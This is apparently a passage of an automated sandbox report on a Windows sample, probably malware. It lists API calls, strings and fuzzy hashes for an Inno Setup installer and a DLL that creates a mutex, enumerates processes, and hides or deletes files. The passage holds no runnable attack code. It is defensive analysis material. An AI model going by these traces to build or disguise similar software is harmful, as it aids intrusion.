                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000), ref: 0040C19E
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F,?,?,00000000,00000000), ref: 0040C1AD
                                                                                    • IsValidLocale.KERNEL32(00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C1BF
                                                                                    • EnterCriticalSection.KERNEL32(00665C14,00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C21C
                                                                                    • LeaveCriticalSection.KERNEL32(00665C14,00665C14,00000000,00000002,00665C14,00665C14,00000000,0040C260,?,?,?,00000000,?,0040CB40,00000000,0040CB9F), ref: 0040C245
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                    • String ID: en-GB,en,en-US,
                                                                                    • API String ID: 975949045-3021119265
                                                                                    • Opcode ID: 0a5da7250e5a4448c1ff3f9645c04e69b407b2ebd84de03ae06c26d7c7f18a7c
                                                                                    • Instruction ID: 62fecbf31074def960baab5c845f0e3528801b11b7ae68e71bde5ae064a172bd
                                                                                    • Opcode Fuzzy Hash: 0a5da7250e5a4448c1ff3f9645c04e69b407b2ebd84de03ae06c26d7c7f18a7c
                                                                                    • Instruction Fuzzy Hash: EC2196A0750701BADB207BBA8C8365925999B85B09F50457FF041BB7C2DE7C9D4182AF

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 10015E0A
                                                                                    • GetLastError.KERNEL32 ref: 10015E13
                                                                                    • CloseHandle.KERNEL32(?), ref: 10015E24
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E2C
                                                                                    • GetCurrentThread.KERNEL32 ref: 10015E3C
                                                                                    • WaitForSingleObject.KERNEL32(00000000), ref: 10015E43
                                                                                    • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 10015E58
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015E65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThreadexit$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 355449500-0
                                                                                    • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction ID: 0f97a28617a5a68d27cb6afa5f47f3953ca9a481207b566471c0f9ba98c6beaf
                                                                                    • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                    • Instruction Fuzzy Hash: 69014430A84318FBF791ABF08C4EB4D3A65EB08703F104440F709AE1D0CAB5D7848B25

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                      • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                      • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep$CreateInitSnapshotToolhelp32Variantexit
                                                                                    • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$wpsv.5.6.3.exe
                                                                                    • API String ID: 4205734914-2781284179
                                                                                    • Opcode ID: 4bc7c9451939abfa0745cb850ad1dcc3da066166c1ff9d2bdedd87da215de9cc
                                                                                    • Instruction ID: 01e91d36be03056c32c976757ddfbd5278b963073b9274932eac54e5bb7bc252
                                                                                    • Opcode Fuzzy Hash: 4bc7c9451939abfa0745cb850ad1dcc3da066166c1ff9d2bdedd87da215de9cc
                                                                                    • Instruction Fuzzy Hash: C321ACB4C01218EBEB14CFA0DC99BEEB770FF45391F504298F4052A28ADB34AB44CB51

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FEE
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FFB
                                                                                    • _CxxThrowException.VCRUNTIME140(?,10019CBC), ref: 100166FE
                                                                                    • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 1001670D
                                                                                    • _CxxThrowException.VCRUNTIME140(?,10019D9C), ref: 1001671B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                    • String ID:
                                                                                    • API String ID: 1722040371-0
                                                                                    • Opcode ID: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                    • Instruction ID: 08eecf3aab68b4969477acf4f8a3a2caa643f1c7ff8f01e52dc4bc7ddf13aa92
                                                                                    • Opcode Fuzzy Hash: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                    • Instruction Fuzzy Hash: 56F0543880420DB78F04E6B9EC169ED777CEB04290F604125FA689D4D5EB71F6DA85D4

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 10012FBA
                                                                                    • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000000), ref: 10012FE7
                                                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,00000040,00000022,?), ref: 10013068
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@?setstate@?$basic_ios@D@std@@@1@_V?$basic_streambuf@
                                                                                    • String ID:
                                                                                    • API String ID: 2185338108-0
                                                                                    • Opcode ID: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                    • Instruction ID: 106bc35cbdd57d80b480a718a0c65df66589e39bca71049decacc3f2370ba628
                                                                                    • Opcode Fuzzy Hash: 88d071829cc17b632e2f1fa59299d32dbac0b10e089369fb1704501315f6ea19
                                                                                    • Instruction Fuzzy Hash: AB313CB4A0021ADFDB04CF98CD91BAEB7B5FF48704F108658E916AB391C771AA41CB91

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 1000148B
                                                                                    • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 100014AA
                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100014DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                    • String ID:
                                                                                    • API String ID: 2577077003-0
                                                                                    APIs
                                                                                    • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                    • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1001092F,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10012400: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?write@?$basic_ostream@AttributesBios_base@std@@FileV12@
                                                                                    • String ID:
                                                                                    • API String ID: 1581416325-0
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040CB9F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040CC26,00000000,?,00000105), ref: 0040CB33
                                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040CB9F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040CC26,00000000,?,00000105), ref: 0040CB5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguage$SystemUser
                                                                                    • String ID:
                                                                                    • API String ID: 384301227-0
                                                                                    APIs
                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000022,00000040,1001304F,000000FF,?,1001304F,00000040,00000022,?), ref: 100135F7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Fiopen@std@@U_iobuf@@
                                                                                    • String ID:
                                                                                    • API String ID: 2284775142-0
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CBE8
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CC39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 1159719554-0
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 0042861E
                                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,00428668,?,00000000,00428686,?,00008000), ref: 0042864D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                    • String ID:
                                                                                    • API String ID: 2987862817-0
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040E4FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString
                                                                                    • String ID:
                                                                                    • API String ID: 2948472770-0
                                                                                    APIs
                                                                                      • Part of subcall function 10012C90: ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(100053B9,?,10012F2A,?,100053B9), ref: 10012C9A
                                                                                      • Part of subcall function 10012C90: ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(CCC35DE5,CCC35DE5,8B55CCCC,?,10012F2A,?,100053B9), ref: 10012CC2
                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@?setg@?$basic_streambuf@D00@fclose
                                                                                    • String ID:
                                                                                    • API String ID: 2996004546-0
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040B93E
                                                                                      • Part of subcall function 0040CBAC: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CBE8
                                                                                      • Part of subcall function 0040CBAC: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CC39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileModuleName$LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 4113206344-0
                                                                                    APIs
                                                                                      • Part of subcall function 10012F10: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?setstate@?$basic_ios@D@std@@@std@@U?$char_traits@fclose
                                                                                    • String ID:
                                                                                    • API String ID: 2040537880-0
                                                                                    APIs
                                                                                    • DeleteFileA.KERNEL32(100108FE,?,100108FE,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    APIs
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000080,?,100115DD,?,00000000,?,?,?,?,?,?,00000063,?,00000070,?), ref: 10005751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,0042868D), ref: 00428680
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: allocator
                                                                                    • String ID:
                                                                                    • API String ID: 3447690668-0
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,-00000004,000000BF,00404283,0000001B,00404828,02453360,0040726E,0040760F,?,00000000,02453360,004072DD), ref: 00403C83
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 0061A7D4
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,0061AA67,?,?,?,00000000,?,0061B466,?,?,00000000), ref: 0061A7DD
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A7E7
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000,0061AA67,?,?,?,00000000,?,0061B466,?,?,00000000), ref: 0061A7F0
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A866
                                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A874
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00661F70,00000003,00000000,00000000,00000000,0061AA23,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 0061A8BC
                                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0061AA12,?,00000000,C0000000,00000000,00661F70,00000003,00000000,00000000,00000000,0061AA23), ref: 0061A8F5
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                    • CreateProcessW.KERNEL32(00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0061A99E
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0061A9D4
                                                                                    • CloseHandle.KERNEL32(000000FF,0061AA19,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0061AA0C
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                    • API String ID: 770386003-3271284199
                                                                                    Strings
                                                                                    • InitializeUninstall, xrefs: 0064F64B
                                                                                    • Uninstall DAT: , xrefs: 0064F306
                                                                                    • Setup version: Inno Setup version 6.0.5 (u), xrefs: 0064F2D8
                                                                                    • Uninstall command line: , xrefs: 0064F326
                                                                                    • Cannot find utCompiledCode record for this version of the uninstaller, xrefs: 0064F452
                                                                                    • InitializeUninstall returned False; aborting., xrefs: 0064F67E
                                                                                    • Install was done in 64-bit mode but not running 64-bit Windows now, xrefs: 0064F4A8
                                                                                    • Removed all? %s, xrefs: 0064F79F
                                                                                    • Not calling UninstallNeedRestart because a restart has already been deemed necessary., xrefs: 0064F85D
                                                                                    • UninstallNeedRestart, xrefs: 0064F7DF, 0064F81C
                                                                                    • Will restart because UninstallNeedRestart returned True., xrefs: 0064F82E
                                                                                    • Event, xrefs: 0064F57B
                                                                                    • DeinitializeUninstall, xrefs: 0064FA0C
                                                                                    • Original Uninstall EXE: , xrefs: 0064F2EB
                                                                                    • Need to restart Windows? %s, xrefs: 0064F880
                                                                                    • Will not restart Windows automatically., xrefs: 0064F962
                                                                                    • Uninstall, xrefs: 0064F28B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Show
                                                                                    • String ID: Cannot find utCompiledCode record for this version of the uninstaller$DeinitializeUninstall$Event$InitializeUninstall$InitializeUninstall returned False; aborting.$Install was done in 64-bit mode but not running 64-bit Windows now$Need to restart Windows? %s$Not calling UninstallNeedRestart because a restart has already been deemed necessary.$Original Uninstall EXE: $Removed all? %s$Setup version: Inno Setup version 6.0.5 (u)$Uninstall$Uninstall DAT: $Uninstall command line: $UninstallNeedRestart$Will not restart Windows automatically.$Will restart because UninstallNeedRestart returned True.
                                                                                    • API String ID: 3609083571-1139549536
                                                                                    • Opcode ID: 22bf36efd2d9069785d056405695bf985450d9e08495da1d136dca054f8b90b8
                                                                                    • Instruction ID: b395923e521076bf2bceb30747a8197c7c47a38b115d8df3202869f321eb7a22
                                                                                    • Opcode Fuzzy Hash: 22bf36efd2d9069785d056405695bf985450d9e08495da1d136dca054f8b90b8
                                                                                    • Instruction Fuzzy Hash: 4B32AE346046458FD754EF68E891B997BF3FB4A304F105079F900AB3A2CBB4AC85CB55
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B128A
                                                                                    • GetVersion.KERNEL32(00000000,005B1433,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B12A7
                                                                                    • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005B1433,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B12C1
                                                                                    • FreeSid.ADVAPI32(00000000,005B143A,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B142D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
